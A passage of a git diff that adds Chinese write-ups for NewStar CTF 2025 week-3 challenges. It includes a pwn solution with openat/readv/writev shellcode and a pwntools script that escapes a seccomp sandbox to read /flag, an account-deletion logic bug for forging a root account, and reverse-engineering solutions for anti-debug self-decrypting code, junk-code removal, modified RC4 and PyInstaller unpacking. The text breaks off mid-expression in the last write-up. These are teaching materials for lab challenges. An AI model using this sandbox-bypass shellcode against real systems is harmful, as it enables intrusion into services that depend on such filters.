快速查看沙箱规则。沙箱规则通常分为白名单和黑名单:白名单表示仅允许指定系统调用,黑名单表示禁止指定系统调用。 + +可以看到程序禁用了 `execve`、`execveat`、`open`、`read`、`write`、`sendfile`,当程序发现系统调用号和上面五个函数的系统调用号相同时,会直接结束进程。 + +![seccomp-tools 查看沙箱规则](/assets/images/wp/2025/week3/sandbox-plus_3.jpg) + +因此需要绕过沙箱读取 FLAG。这里考虑通过 `openat` 打开 `/flag` 文件,随后通过 `readv` 和 `writev` 将内容输出到终端。 + +```c +int openat(int dirfd, const char *pathname, int flags, mode_t mode); +ssize_t readv(int fd, const struct iovec *iov, int iovcnt); +ssize_t writev(int fd, const struct iovec *iov, int iovcnt); +``` + +在 `openat` 函数中,第一个参数传入 `-100`,第二个参数传入 `"/flag"` 的地址即可打开 FLAG 文件。 + +调用 `openat` 的 shellcode 可以写为: + +```asm +mov rdi, -100 +mov rsi, 0x67616c662f +push rsi +mov rsi, rsp +mov rdx, 0 +mov rax, 257 +syscall +``` + +`readv` 和 `writev` 依赖 `iov` 结构体,该结构体如下: + +```c +struct iovec { + void *iov_base; // 缓冲区起始地址 + size_t iov_len; // 缓冲区长度(字节数) +}; +``` + +因此需要先构建该结构体,随后将结构体地址设置为 `readv` 和 `writev` 的第二个参数。函数的第三个参数是 `iov` 数组中的元素数量,可以设置为 1。 + +可以将结构体布置在栈上。执行上面的 `openat` shellcode 后,`rsi` 中保留了栈地址,因此可以通过 `rsi` 指定 `readv` 读入地址和 `writev` 写出地址。shellcode 如下: + +```asm +add rsi, 8 +push 0x500 +push rsi +// readv +mov rsi, rsp +mov rdi, 3 +mov rdx, 1 +mov rax, 19 +syscall + +// writev +mov rdi, 1 +mov rax, 20 +syscall +``` + +因此可以得到 EXP: + +```python +from pwn import * +context(os="linux", arch="amd64", log_level="debug") + +io = remote("127.0.0.1", 11337) +# io = process("attachment/pwn") +shell = """ +// openat +mov rdi, -100 +mov rsi, 0x67616c662f +push rsi +mov rsi, rsp +mov rdx, 0 +mov rax, 257 +syscall + +// readv +add rsi, 8 +push 0x500 +push rsi +mov rsi, rsp +mov rdi, 3 +mov rdx, 1 +mov rax, 19 +syscall + +// writev +mov rdi, 1 +mov rax, 20 +syscall +""" +# shell = shellcraft.sh() +shell = asm(shell) +# gdb.attach(io) +# pause() + +print(shell) +io.send(shell) + +io.interactive() +``` diff --git a/docs/wp/2025/week3/pwn/xiaoming-question.md b/docs/wp/2025/week3/pwn/xiaoming-question.md new file mode 100644 index 0000000..2298568 --- /dev/null +++ b/docs/wp/2025/week3/pwn/xiaoming-question.md @@ -0,0 +1,46 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# 小的明?题问 + +## 分析 + +漏洞在下面这个地方 + +```cpp + + memset(currrnt_account, 0, sizeof(user)); +} + +//account.c 40 +int account_delete(user *current_account, user *input_account) +{ + if(memcmp(current_account, input_account, sizeof(user))) + return -1; + + int idx = find_account(input_account->username); + + memset(&users[idx], 0, sizeof(user)); + memcpy(&users[idx], &users[idx + 1], sizeof(user) * (user_counts - idx - 1)); + account_logout(current_account); + + user_counts--; + return 0; +// 在这个地方,你可以开两个 nc 端口,同时登录两个账号 +// 然后再把他们都 delete 掉 +// 这样 user_counts 就会等于 0,find_user 就找不到 root 账号 +// 你就可以注册你自己的 root 帐号了 +} + +int account_rename(user *current_account, user *old_account, user *new_account) +{ +``` + +另外一个漏洞是在 `add` 的时候程序会把 ` ` 和 `\n` 替换成 `\0` + +而 `get_flag` 用的是 `strcmp` 进行比较 + +只要重命名为 `root 1`,就会被替换成 `root\01`,并通过 `get_flag` 的条件,直接获得 FLAG。 + +本题无需编写 EXP,使用 nc 交互即可完成利用。 diff --git a/docs/wp/2025/week3/reverse/dancing-functions.md b/docs/wp/2025/week3/reverse/dancing-functions.md new file mode 100644 index 0000000..13e5808 --- /dev/null +++ b/docs/wp/2025/week3/reverse/dancing-functions.md @@ -0,0 +1,269 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# Dancing Functions + +主函数: + +```cpp +int __fastcall main(int argc, const char **argv, const char **envp) +{ + int v4; // [rsp+2Ch] [rbp-14h] + void *Block; // [rsp+30h] [rbp-10h] + char *Str1; // [rsp+38h] [rbp-8h] + + sub_140002060(argc, argv, envp); + SetConsoleOutputCP(0xFDE9u); + sub_140003130("Input your message to encrypt: "); + Str1 = (char *)malloc(0x10000u); + sub_1400030E0("%s"); + if ( (unsigned int)sub_140001BCD(Str1) ) + { + Block = (void *)KeyGen(); + sub_140001C42(Block, Str1); + v4 = strcmp(Str1, Str2); // ".sBtQ=0JEhC#sbw=Q-Y*3h-PGpcvZ9SbU+9F5tH96e>-5hMF" + sub_140003130("The Chemical form of your encrypted message is: "); + Dont_Look_At_Me_I_Am_Just_A_Print_Function(Str1); + if ( v4 ) + sub_140003130("Wrong FLAG!\n"); + else + sub_140003130("Right FLAG!\n"); + free(Block); + } + else + { + sub_140003130("Wrong FLAG format!The input should be in ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz012345678" + "9!#$%&*+-.<=>?@_{|}~\n"); + } + free(Str1); + return 0; +} +``` + +有一个长度为81的字符表,约束了输入的字符集,还有一个没什么用的打印函数 + +keygen是一个函数指针,静态指向一个函数: + +```cpp +_BYTE *sub_1400018D2() +{ + srand(0x11451419u); + do + { + do + n11 = rand() % 81; + while ( n11 <= 11 ); + } + while ( n11 > 16 ); + v1 = malloc(n11 + 1); + for ( n11_1 = 0; n11_1 < n11; ++n11_1 ) + v1[n11_1] = Str[rand() % 81]; + v1[n11] = 0; + return v1; +} +``` + +但keygen还有多个xref,其中有一个函数可以在main之前执行: + +```cpp +__int64 I_Can_Run_Before_Main() +{ + if ( IsDebuggerPresent() ) + KeyGen = sub_1400016DD; + else + KeyGen = (__int64 (__fastcall *)())lpAddress_; + if ( (unsigned int)pthread_create(&v1, 0, p_sub_1400019C9, 0) ) + sub_140002C60(1); + return pthread_detach(v1); +} +``` + +检测了调试器,切换了keygen到一个地址,查看这个地址: + +```asm +.text:00000001400017DA +.text:00000001400017DA ; --------------------------------------------------------------------------- +.text:00000001400017DB lpAddress_ db 99h, 84h, 45h, 29h, 84h +.text:00000001400017DB ; DATA XREF: p_sub_1400019C9+C↓o +.text:00000001400017DB ; I_Can_Run_Before_Main:loc_140001AC5↓o ... +.text:00000001400017E0 dq 0CCDD89D875FC204Fh, 34890BCCCCD0C724h, 0CCD73B24CCCCCCCCh +.text:00000001400017F8 dq 0A5840EAF840E45CCh, 240D84D5847C310Ch, 350D1D45CF340DECh +.text:0000000140001810 dq 814734894504E5D3h, 4CDCF2C0D044534h, 0CDCCCCCCCC09C041h +.text:0000000140001828 dq 0B14F3499450EE504h, 0DC34B14F0CB2C734h, 3489475C7427CEB2h +.text:0000000140001840 dq 0D45845484CD0C4Fh, 894584CCCCD03724h, 0CCCCCCCC30890B3Ch +.text:0000000140001858 dq 45CCCCD75D249B27h, 310CA5840DAF840Dh, 45EC240D84D5847Ch +.text:0000000140001870 dq 340D0445CF360D0Eh, 0CF2C0D1C450EE5D3h, 0CCCCCC09D8411CCDh +.text:0000000140001888 dq 8406450DE51CCDCCh, 0CCFBABD941840EAFh, 308947DCC07AC3CCh +.text:00000001400018A0 dq 0CD843C9947845484h, 30894FDC4406451Ch, 0B03489F7308947CDh +.text:00000001400018B8 dq 478454843489476Dh, 0CCCC0A1CCD843C99h, 0FC084F843C894784h +.text:00000001400018D0 db 91h, 0Fh +.text:00000001400018D2 +.text:00000001400018D2 ; =============== S U B R O U T I N E ======================================= +.text:00000001400018D2 +``` + +发现无法解析,再查看这个地址的xref: + +```cpp +__int64 p_sub_1400019C9() +{ + HANDLE hProcess; // rax + DWORD flOldProtect; // [rsp+2Ch] [rbp-24h] BYREF + SIZE_T dwSize; // [rsp+30h] [rbp-20h] + __int64 (__fastcall *p_sub_1400018D2)(); // [rsp+38h] [rbp-18h] + LPVOID lpAddress; // [rsp+40h] [rbp-10h] + SIZE_T dwSize_1; // [rsp+48h] [rbp-8h] + + lpAddress = lpAddress_; + p_sub_1400018D2 = sub_1400018D2; + dwSize = (char *)sub_1400018D2 - (char *)lpAddress_; + if ( VirtualProtect(lpAddress_, (char *)sub_1400018D2 - (char *)lpAddress_, 0x40u, &flOldProtect) ) + { + for ( dwSize_1 = 0; dwSize_1 < dwSize; ++dwSize_1 ) + *((_BYTE *)lpAddress + dwSize_1) ^= 0xCCu; + VirtualProtect(lpAddress, dwSize, flOldProtect, &flOldProtect); + hProcess = GetCurrentProcess(); + FlushInstructionCache(hProcess, lpAddress, dwSize); + } + return 0; +} +``` + +可以发现其在运行过程中被xor了0xCC以进行自解密,恢复解密后的函数: + +```cpp +unsigned char* TrueKeyGen() { + srand(0x114514); + int len = 0; + while (1) { len = rand() % 81; if (12 <= len && len <= 16) { break;}} + unsigned char* key = (unsigned char*)malloc(len + 1); + for (int index = 0; index < len; index++) { key[index] = alphabet[rand() % 81];} + key[len] = '\0'; + return key; +} +``` + +查看加密函数: + +```cpp +void sub_140001C42(unsigned char* key, unsigned char* message) { + // 初始化密钥 + int keyLen = strlen((const char*)key); + int messageLen = strlen((const char*)message); + Init(message, messageLen); + + // 初始化 S 盒 + int sboxSize = strlen(alphabet); + unsigned char sbox[sboxSize]; + for (int i = 0; i < sboxSize; i++) { + sbox[i] = 80 - i; // 0~80 + } + + // KSA + unsigned char t = 0; + for (int j = 0; j < sboxSize; j++) { + t = (t + sbox[j] + key[j % keyLen]) % sboxSize; + // 交换 sbox[j] 和 sbox[t] + unsigned char temp = sbox[j]; + sbox[j] = sbox[t]; + sbox[t] = temp; + } + + // PRGA + int m = 0, n = 0; + for (int k = 0; k < messageLen; k++) { + m = (m ^ n) % sboxSize; + n = (n + sbox[m]) % sboxSize; + // 交换 sbox[m] 和 sbox[n] + unsigned char temp = sbox[m]; + sbox[m] = sbox[n]; + sbox[n] = temp; + message[k] = alphabet[(message[k] + sbox[(sbox[m] ^ sbox[n]) % sboxSize]) % sboxSize]; + } +} +``` + +是一个类RC4函数,只不过空间只有81,编写脚本解密: + +```cpp +#include +#include +#include + +static const char alphabet[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!#$%&*+-.<=>?@_{|}~"; + +int char_to_index(unsigned char c) { + for (int i = 0; i < 81; i++) { + if (alphabet[i] == c) + return i; + } + return -1; +} + +unsigned char* TrueKeyGen() { + srand(0x114514); + int len = 0; + while (1) { + len = rand() % 81; + if (12 <= len && len <= 16) { + break; + } + } + unsigned char* key = (unsigned char*)malloc(len + 1); + for (int index = 0; index < len; index++) { + key[index] = alphabet[rand() % 81]; + } + key[len] = '\0'; + return key; +} + +int main() { + unsigned char ciphertext[] = ".sBtQ=0JEhC#sbw=Q-Y*3h-PGpcvZ9SbU+9F5tH96e>-5hMF"; + int cipher_len = strlen((char*)ciphertext); + unsigned char* key = TrueKeyGen(); + int keyLen = strlen((char*)key); + printf("key: %s\n", key); + int sboxSize = 81; + unsigned char sbox[81]; + for (int i = 0; i < sboxSize; i++) { + sbox[i] = 80 - i; + } + + unsigned char t = 0; + for (int j = 0; j < sboxSize; j++) { + t = (t + sbox[j] + key[j % keyLen]) % sboxSize; + unsigned char temp = sbox[j]; + sbox[j] = sbox[t]; + sbox[t] = temp; + } + + int m = 0, n = 0; + unsigned char* plaintext = (unsigned char*)malloc(cipher_len + 1); + + for (int k = 0; k < cipher_len; k++) { + m = (m ^ n) % sboxSize; + n = (n + sbox[m]) % sboxSize; + unsigned char temp = sbox[m]; + sbox[m] = sbox[n]; + sbox[n] = temp; + unsigned char keystream = sbox[(sbox[m] ^ sbox[n]) % sboxSize]; + int cipher_idx = char_to_index(ciphertext[k]); + if (cipher_idx == -1) { + fprintf(stderr, "Invalid cipher char: %c\n", ciphertext[k]); + exit(1); + } + int plain_idx = (cipher_idx - keystream + sboxSize) % sboxSize; + plaintext[k] = alphabet[plain_idx]; + } + plaintext[cipher_len] = '\0'; + + printf("Plaintext: %s\n", plaintext); + + free(key); + free(plaintext); + return 0; +} +``` + +`flag{D4nc1Ng_K3yG3N_fUnct10n5_wItH_r4nD_4Nd_5Mc}` diff --git a/docs/wp/2025/week3/reverse/flower-2.md b/docs/wp/2025/week3/reverse/flower-2.md new file mode 100644 index 0000000..43bba8f --- /dev/null +++ b/docs/wp/2025/week3/reverse/flower-2.md @@ -0,0 +1,213 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# 采一朵花,送给艾达(2) + +程序主函数中有花: + +```asm +.text:000000014000198F call free +.text:0000000140001994 mov eax, 1BF52h +.text:0000000140001999 +.text:0000000140001999 loc_140001999: ; CODE XREF: main+9C↓j +.text:0000000140001999 jmp loc_140001AF0 +.text:000000014000199E loc_14000199E: ; CODE XREF: main+67↑j +.text:000000014000199E xor eax, eax +.text:00000001400019A0 jz short near ptr loc_1400019A4+1 +.text:00000001400019A2 jnz short near ptr loc_1400019A4+1 +.text:00000001400019A4 +.text:00000001400019A4 loc_1400019A4: ; CODE XREF: main+93↑j +.text:00000001400019A4 ; main+95↑j +.text:00000001400019A4 call near ptr 0CA5CD1F1h +.text:00000001400019A9 loope near ptr loc_140001999+1 +.text:00000001400019AB lock cmp ah, [rdi+48h] +.text:00000001400019B0 mov [rbp+500h+var_560], eax +.text:00000001400019B3 mov rax, 0DCBAFF24A65D456h +``` + +A4位置取消定义A5位置重定义,反编译: + +```cpp +int __fastcall main(int argc, const char **argv, const char **envp) +{ + _main(*(_QWORD *)&argc, argv, envp); + printf(&Format); + *(_QWORD *)&Size[1] = malloc(0x10000u); + scanf("%s", *(_QWORD *)&Size[1]); + Size[0] = strlen(*(const char **)&Size[1]); + if ( Size[0] == 40 ) + { + v4[0] = 0x673AF04AEFE18A5CLL; + v4[1] = 0xDCBAFF24A65D456LL; + v4[2] = 0xCFD8B1539076E546uLL; + v4[3] = 0xFD469B79EF8A33B7uLL; + v4[4] = 0x5985D24E20980BECLL; + v8 = (char *)KeyGen(); + v7 = strlen(v8); + rc4_init(v5, v8, v7); + memcpy(v6, *(const void **)&Size[1], Size[0]); + rc4_crypt(v5, v6, Size[0]); + for ( i = 0; i < Size[0]; ++i ) + { + if ( v6[i] != *((_BYTE *)v4 + i) ) + { + printf(&Format_); + free(*(void **)&Size[1]); + return 0; + } + } + printf(&Format__0); + free(*(void **)&Size[1]); + return 0; + } + else + { + puts(&Buffer); + free(*(void **)&Size[1]); + return 114514; + } +} +``` + +Keygen中有类似的花,去除后反编译: + +```cpp +const char *KeyGen() +{ + malloc(0x11u); + return "PickingUpFlowers"; +} +``` + +查看RC4init: + +```cpp +__int64 rc4_init() +{ + v6 = 0; + strcpy(Destination, "Wow! Why this function looks empty???"); + v4 = 0; + memset(buf_, 0, sizeof(buf_)); + strcpy(Source, "Not all kinds of the junk codes will make IDA fail analyze and dispaly JUMPOUT."); + strcpy( + Try_to_use_TAB_to_switch_to_the_assembly_page_and_find_out_what, + "Try to use TAB to switch to the assembly page and find out what happened to this function."); + strcat(Destination, Source); + strcat(Destination, Try_to_use_TAB_to_switch_to_the_assembly_page_and_find_out_what); + return 0; +} +``` + +发现函数几乎是空的,没有重要逻辑,也没有jumpout,但是提示要查看汇编: + +```asm +.text:0000000140001621 call strcat +.text:0000000140001626 push rax +.text:0000000140001627 xor rax, rax +.text:000000014000162A xor rax, 17h +.text:000000014000162E sub rax, 10h +.text:0000000140001632 call $+5 +.text:0000000140001637 +.text:0000000140001637 label_of_flower: +.text:0000000140001637 add rax, 0Dh +.text:000000014000163B xor rax, 0 +.text:000000014000163F and rax, 7 +.text:0000000140001643 and rax, 21h +.text:0000000140001647 cmp rax, 1 +.text:000000014000164B jz short label_continue_to_normal_code +.text:000000014000164D retn +.text:000000014000164E ; --------------------------------------------------------------------------- +.text:000000014000164E +.text:000000014000164E label_continue_to_normal_code: ; CODE XREF: rc4_init+1FB↑j +.text:000000014000164E pop rax +.text:000000014000164F mov [rbp+170h+var_14], 0 +.text:0000000140001659 jmp short loc_140001683 +``` + +发现了call $+5和retn,符号表也给出了这里正常代码的恢复位置,将call $+5到retn的位置全部nop即可 + +```cpp +char *__fastcall rc4_init(unsigned __int8 *a1, unsigned __int8 *a2, int a3) +{ + v10 = 0; + strcpy(Destination, "Wow! Why this function looks empty???"); + v7 = 0; + memset(buf_, 0, sizeof(buf_)); + strcpy(Source, "Not all kinds of the junk codes will make IDA fail analyze and dispaly JUMPOUT."); + strcpy( + Try_to_use_TAB_to_switch_to_the_assembly_page_and_find_out_what, + "Try to use TAB to switch to the assembly page and find out what happened to this function."); + strcat(Destination, Source); + result = strcat(Destination, Try_to_use_TAB_to_switch_to_the_assembly_page_and_find_out_what); + for ( i = 0; i <= 255; ++i ) + { + result = (char *)&a1[i]; + *result = i ^ 0xCC; + } + for ( i = 0; i <= 255; ++i ) + { + v10 = (a1[i] + v10 + a2[i % a3]) % 256; + v9 = a1[i]; + a1[i] = a1[v10]; + result = (char *)v9; + a1[v10] = v9; + } + return result; +} +``` + +发现和正常的RC4_KSA相比略有魔改,PRGA函数也有类似之前的两个花,去除即可: + +```cpp +void __fastcall rc4_crypt(unsigned __int8 *a1, _BYTE *a2, __int64 Size) +{ + v7 = 0; + v6 = 0; + for ( Size_1 = 0; Size_1 < (int)Size; ++Size_1 ) + { + v7 = (v7 + 1) % 256; + v6 = (a1[v7] + v6) % 256; + v3 = a1[v7]; + a1[v7] = a1[v6]; + a1[v6] = v3; + a2[Size_1] ^= a1[(unsigned __int8)(a1[v7] + a1[v6])]; + } + for ( Size_2 = 0; Size_2 < (int)Size; ++Size_2 ) + a2[Size_2] += Size_2; +} +``` + +尾部多了一个加索引,解密时前置即可 + +编写解密脚本: + +```py +def rc4(key, ciphertext): + temp = bytearray() + for i, b in enumerate(ciphertext): + temp.append((b - i) % 256) + S = list(range(256)) + for i in range(256): + S[i] ^= 0xCC + j = 0 + for i in range(256): + j = (j + S[i] + key[i % len(key)]) % 256 + S[i], S[j] = S[j], S[i] + i = j = 0 + plaintext = bytearray() + for char in temp: + i = (i + 1) % 256 + j = (j + S[i]) % 256 + S[i], S[j] = S[j], S[i] + t = (S[i] + S[j]) % 256 + plaintext.append(char ^ S[t]) + return bytes(plaintext) + +enc = bytearray.fromhex("5c8ae1ef4af03a6756d4654af2afcb0d46e5769053b1d8cfb7338aef799b46fdec0b98204ed28559") +key = b"PickingUpFlowers" +dec = rc4(key, enc) +print(dec) +``` + +`flag{WO0o0O0w_So0Oo0o_m4Ny_F1oO0o0oW3R5}` diff --git a/docs/wp/2025/week3/reverse/pyz3.md b/docs/wp/2025/week3/reverse/pyz3.md new file mode 100644 index 0000000..1a54125 --- /dev/null +++ b/docs/wp/2025/week3/reverse/pyz3.md @@ -0,0 +1,121 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# pyz3 + +![DIE 查壳结果](/assets/images/wp/2025/week3/pyz3_1.png) + +`DIE` 查壳后发现附件是由 `PyInstaller` 打包的,先用 [PyInstaller Extractor](https://github.com/extremecoders-re/pyinstxtractor) 对 exe 进行解包。 + +运行 `python path\to\pyinstxtractor.py task.exe` 后,根目录下会生成一个 `task.exe_extracted` 文件夹,exe 所有的资源文件都在这个文件夹中。由于 `PyInstaller` 打包时会把其他库也打包进去,所以文件夹里面的文件比较多,我们要分析的话只要分析 `task.pyc` 就可以了(一般来说与原程序名相同)。 + +> [!TIP] +> +> 网上很多教程中会有补充 magic number 的步骤,但其实最新版的 PyInstaller Extractor 已经可以自动补充 magic number 了,不需要手动补充。 + +`pyc` 文件是 Python 编译后的字节码文件,对于 pyc 文件的反编译,这里推荐几个工具: + +- 在线反编译网站: + - [在线 Python pyc 文件编译与反编译](https://www.lddgo.net/string/pyc-compile-decompile)(3.9以下成功率较高) + - [PyLingual](https://pylingual.io/)(不会像 pycdc 那样注明哪里没有反编译成功,有时会缺失一部分代码) +- 本地反编译工具: + - [Decompyle++](https://github.com/zrax/pycdc)(pycdc 和 pycdas) + - [Pylingual](https://github.com/syssec-utd/pylingual)(不支持 Windows) + - uncompyle6(可直接 pip install,对 3.9 以上版本的支持不佳) + +实际分析时常用的是 `Pylingual` 和 `Decompyle++` ,这两个可以覆盖大部分情况,其他工具可能受版本影响,稳定性相对较差。 + +下面是 `pycac` 对 `task.pyc` 反编译后的结果: + +```python +# Source Generated with Decompyle++ +# File: task.pyc (Python 3.12) + +def check(flag): + if 47 * flag[0] + 41 * flag[1] + 32 * flag[2] + 56 * flag[3] + 52 * flag[4] + 67 * flag[5] + 13 * flag[6] + 25 * flag[7] + 20 * flag[8] + 98 * flag[9] + 88 * flag[10] + 65 * flag[11] + 82 * flag[12] + 92 * flag[13] + 3 * flag[14] + 29 * flag[15] + 93 * flag[16] + 88 * flag[17] + 45 * flag[18] + 58 * flag[19] + 40 * flag[20] + 72 * flag[21] + 99 * flag[22] + 10 * flag[23] + 94 * flag[24] + 62 * flag[25] + 82 * flag[26] + 92 * flag[27] + 23 * flag[28] + 46 * flag[29] + 55 * flag[30] + 72 * flag[31] + 44 * flag[32] + 9 * flag[33] + 65 * flag[34] + 42 * flag[35] == 176386 and 10 * flag[0] + 98 * flag[1] + 5 * flag[2] + 28 * flag[3] + 68 * flag[4] + 20 * flag[5] + 2 * flag[6] + 22 * flag[7] + 65 * flag[8] + 44 * flag[9] + 85 * flag[10] + 97 * flag[11] + 33 * flag[12] + 74 * flag[13] + 93 * flag[14] + 74 * flag[15] + 41 * flag[16] + 65 * flag[17] + 32 * flag[18] + 93 * flag[19] + 22 * flag[20] + 69 * flag[21] + 68 * flag[22] + 57 * flag[23] + 47 * flag[24] + 29 * flag[25] + 74 * flag[26] + 54 * flag[27] + 91 * flag[28] + 90 * flag[29] + 26 * flag[30] + 11 * flag[31] + 89 * flag[32] + 57 * flag[33] + 100 * flag[34] + 95 * flag[35] == 186050 and 25 * flag[0] + 22 * flag[1] + 54 * flag[2] + 5 * flag[3] + 8 * flag[4] + 3 * flag[5] + 12 * flag[6] + 70 * flag[7] + 25 * flag[8] + 61 * flag[9] + 68 * flag[10] + 12 * flag[11] + 27 * flag[12] + 42 * flag[13] + 83 * flag[14] + 91 * flag[15] + 67 * flag[16] + 46 * flag[17] + 8 * flag[18] + 45 * flag[19] + 94 * flag[20] + 80 * flag[21] + 69 * flag[22] + 95 * flag[23] + 12 * flag[24] + 21 * flag[25] + 94 * flag[26] + 82 * flag[27] + 93 * flag[28] + 41 * flag[29] + 4 * flag[30] + 56 * flag[31] + 92 * flag[32] + 77 * flag[33] + 15 * flag[34] + 30 * flag[35] == 154690 and 33 * flag[0] + 49 * flag[1] + 56 * flag[2] + 40 * flag[3] + 90 * flag[4] + 59 * flag[5] + 82 * flag[6] + 6 * flag[7] + 81 * flag[8] + 32 * flag[9] + 23 * flag[10] + 76 * flag[11] + 93 * flag[12] + 83 * flag[13] + 10 * flag[14] + 44 * flag[15] + 58 * flag[16] + 33 * flag[17] + 79 * flag[18] + 77 * flag[19] + 82 * flag[20] + 56 * flag[21] + 70 * flag[22] + 34 * flag[23] + 45 * flag[24] + 76 * flag[25] + 57 * flag[26] + 43 * flag[27] + 100 * flag[28] + 19 * flag[29] + 11 * flag[30] + 90 * flag[31] + 3 * flag[32] + 60 * flag[33] + 57 * flag[34] + 23 * flag[35] == 172116 and 65 * flag[0] + 70 * flag[1] + 20 * flag[2] + 32 * flag[3] + 75 * flag[4] + 30 * flag[5] + 3 * flag[6] + 78 * flag[7] + 35 * flag[8] + 45 * flag[9] + 95 * flag[10] + 93 * flag[11] + 52 * flag[12] + 32 * flag[13] + 88 * flag[14] + 94 * flag[15] + 67 * flag[16] + 34 * flag[17] + 91 * flag[18] + 88 * flag[19] + 31 * flag[20] + 61 * flag[21] + 17 * flag[22] + 99 * flag[23] + 100 * flag[24] + 49 * flag[25] + 4 * flag[26] + 60 * flag[27] + 81 * flag[28] + 88 * flag[29] + 43 * flag[30] + 34 * flag[31] + 30 * flag[32] + 52 * flag[33] + 18 * flag[34] + 100 * flag[35] == 190544 and 81 * flag[0] + 42 * flag[1] + 28 * flag[2] + 98 * flag[3] + 31 * flag[4] + 46 * flag[5] + 64 * flag[6] + 15 * flag[7] + 49 * flag[8] + 13 * flag[9] + 100 * flag[10] + 81 * flag[11] + 32 * flag[12] + 52 * flag[13] + 59 * flag[14] + 24 * flag[15] + 94 * flag[16] + 32 * flag[17] + 93 * flag[18] + 32 * flag[19] + 13 * flag[20] + 89 * flag[21] + 37 * flag[22] + 30 * flag[23] + 78 * flag[24] + 81 * flag[25] + 9 * flag[26] + 45 * flag[27] + 93 * flag[28] + 100 * flag[29] + 97 * flag[30] + 10 * flag[31] + 80 * flag[32] + 54 * flag[33] + 88 * flag[34] + 85 * flag[35] == 190323 and 76 * flag[0] + 54 * flag[1] + 5 * flag[2] + 14 * flag[3] + 62 * flag[4] + 44 * flag[5] + 24 * flag[6] + 29 * flag[7] + 85 * flag[8] + 87 * flag[9] + 19 * flag[10] + 3 * flag[11] + 65 * flag[12] + 24 * flag[13] + 92 * flag[14] + 37 * flag[15] + 57 * flag[16] + 20 * flag[17] + 45 * flag[18] + 5 * flag[19] + 13 * flag[20] + 91 * flag[21] + 92 * flag[22] + 75 * flag[23] + 36 * flag[24] + 79 * flag[25] + 12 * flag[26] + 22 * flag[27] + 75 * flag[28] + 82 * flag[29] + 28 * flag[30] + 82 * flag[31] + 24 * flag[32] + 53 * flag[33] + 56 * flag[34] + 92 * flag[35] == 162017 and 53 * flag[0] + 52 * flag[1] + 72 * flag[2] + 23 * flag[3] + 26 * flag[4] + 13 * flag[5] + 62 * flag[6] + 96 * flag[7] + 67 * flag[8] + 96 * flag[9] + 66 * flag[10] + 41 * flag[11] + 5 * flag[12] + 18 * flag[13] + 37 * flag[14] + 13 * flag[15] + 61 * flag[16] + 71 * flag[17] + 91 * flag[18] + 96 * flag[19] + 56 * flag[20] + 3 * flag[21] + 65 * flag[22] + 14 * flag[23] + 57 * flag[24] + 69 * flag[25] + 75 * flag[26] + 68 * flag[27] + 10 * flag[28] + 60 * flag[29] + 62 * flag[30] + 95 * flag[31] + 53 * flag[32] + 19 * flag[33] + 7 * flag[34] + 56 * flag[35] == 165118 and 26 * flag[0] + 7 * flag[1] + 49 * flag[2] + 14 * flag[3] + 36 * flag[4] + 87 * flag[5] + 21 * flag[6] + 35 * flag[7] + 15 * flag[8] + 91 * flag[9] + 15 * flag[10] + 100 * flag[11] + 8 * flag[12] + 32 * flag[13] + 100 * flag[14] + 35 * flag[15] + 66 * flag[16] + 3 * flag[17] + 79 * flag[18] + 96 * flag[19] + 82 * flag[20] + 95 * flag[21] + 68 * flag[22] + 13 * flag[23] + 86 * flag[24] + 51 * flag[25] + 24 * flag[26] + 76 * flag[27] + 30 * flag[28] + 60 * flag[29] + 29 * flag[30] + 70 * flag[31] + 40 * flag[32] + 90 * flag[33] + 44 * flag[34] + 3 * flag[35] == 153332 and 47 * flag[0] + 19 * flag[1] + 37 * flag[2] + 93 * flag[3] + 73 * flag[4] + 30 * flag[5] + 45 * flag[6] + 47 * flag[7] + 72 * flag[8] + 85 * flag[9] + 37 * flag[10] + 68 * flag[11] + 89 * flag[12] + 34 * flag[13] + 4 * flag[14] + 50 * flag[15] + 87 * flag[16] + 33 * flag[17] + 87 * flag[18] + 43 * flag[19] + 9 * flag[20] + 61 * flag[21] + 93 * flag[22] + 49 * flag[23] + 74 * flag[24] + 49 * flag[25] + 68 * flag[26] + 29 * flag[27] + 54 * flag[28] + 54 * flag[29] + 37 * flag[30] + 79 * flag[31] + 33 * flag[32] + 65 * flag[33] + 59 * flag[34] + 15 * flag[35] == 168472 and 79 * flag[0] + 73 * flag[1] + 60 * flag[2] + 62 * flag[3] + 25 * flag[4] + 16 * flag[5] + 77 * flag[6] + 81 * flag[7] + 79 * flag[8] + 31 * flag[9] + 82 * flag[10] + 84 * flag[11] + 62 * flag[12] + 36 * flag[13] + 18 * flag[14] + 20 * flag[15] + 46 * flag[16] + 57 * flag[17] + 21 * flag[18] + 40 * flag[19] + 3 * flag[20] + 50 * flag[21] + 58 * flag[22] + 80 * flag[23] + 84 * flag[24] + 71 * flag[25] + 87 * flag[26] + 3 * flag[27] + 13 * flag[28] + 77 * flag[29] + 83 * flag[30] + 39 * flag[31] + 55 * flag[32] + 34 * flag[33] + 41 * flag[34] + 63 * flag[35] == 178706 and 7 * flag[0] + 50 * flag[1] + 26 * flag[2] + 79 * flag[3] + 21 * flag[4] + 42 * flag[5] + 83 * flag[6] + 94 * flag[7] + 63 * flag[8] + 83 * flag[9] + 3 * flag[10] + 68 * flag[11] + 25 * flag[12] + 91 * flag[13] + 3 * flag[14] + 5 * flag[15] + 17 * flag[16] + 61 * flag[17] + 3 * flag[18] + 40 * flag[19] + 87 * flag[20] + 11 * flag[21] + 27 * flag[22] + 74 * flag[23] + 73 * flag[24] + 21 * flag[25] + 56 * flag[26] + 46 * flag[27] + 36 * flag[28] + 24 * flag[29] + 14 * flag[30] + 63 * flag[31] + 21 * flag[32] + 71 * flag[33] + 30 * flag[34] + 53 * flag[35] == 143852 and 57 * flag[0] + 51 * flag[1] + 49 * flag[2] + 15 * flag[3] + 94 * flag[4] + 34 * flag[5] + 27 * flag[6] + 5 * flag[7] + 100 * flag[8] + 68 * flag[9] + 67 * flag[10] + 81 * flag[11] + 10 * flag[12] + 5 * flag[13] + 85 * flag[14] + 70 * flag[15] + 80 * flag[16] + 20 * flag[17] + 89 * flag[18] + 30 * flag[19] + 84 * flag[20] + 35 * flag[21] + 41 * flag[22] + 87 * flag[23] + 75 * flag[24] + 67 * flag[25] + 20 * 